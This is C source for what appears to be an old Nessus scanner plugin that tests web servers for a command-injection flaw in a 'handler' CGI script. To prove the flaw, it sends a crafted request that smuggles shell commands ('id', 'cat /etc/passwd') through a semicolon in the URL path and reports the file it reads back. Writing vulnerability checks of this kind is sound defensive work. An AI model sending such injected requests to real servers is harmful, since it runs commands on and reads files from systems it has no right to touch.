/*
 * 
 * handler
 *
 * This plugin was written by Renaud Deraison and is released
 * under the GPL
 *
 */
#include <includes.h>


#define NAME "handler"
#define DESC "This plugin determines whether a bug of the 'handler' cgi\n\
is present on a remote host. This bug allows a remote user to execute\n\
any command on the server\n\
Risk factor : high"
#define COPYRIGHT "no copyright"
#define SUMM "determines the presence of the bug of the 'handler' cgi"



PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_ATTACK);
	plug_set_family(desc, "CGI abuses");
	return(0);
}



PlugExport int plugin_run(struct arglist * args);	
PlugExport int plugin_run(struct arglist * args)
{

	
	if(host_get_port_state(args, 80)<=0)return(0);
	
	
	if(is_cgi_installed(args, "handler/useless_shit;id|?data=Download"))
	{
	char * test_file = get_preference(args, "test_file");
	char * buffer = emalloc(32000);
	char * result;
	int soc = open_sock_tcp(args, 80);
	
	if(soc<=0)
	 /* Couldn't re-open the connection... Strange !*/
	 post_hole(args, 80, 
	 "The bug of the  'handler' cgi is present\nAny file may be viewed");
	else {
	  	sprintf(buffer, "GET /cgi-bin/handler/useless_shit;cat%%20%s?data=Download\n",
	  		test_file?test_file:"/etc/passwd");
		send(soc, buffer, strlen(buffer), 0);
		bzero(buffer, 4096);
		read(soc, buffer, 4096);
		result = emalloc(strlen(buffer) + 100);
		sprintf(result, "The bug of the 'handler' cgi is present
We attempted to obtain %s :\n%s
Solution : delete this cgi or upgrade it to a recent version", 
	test_file ? test_file:"/etc/passwd", buffer);
		efree(&buffer);
		post_hole(args, 80, result);
		efree(&result);
		socket_close(soc);
		}
	}
	return(0);
}

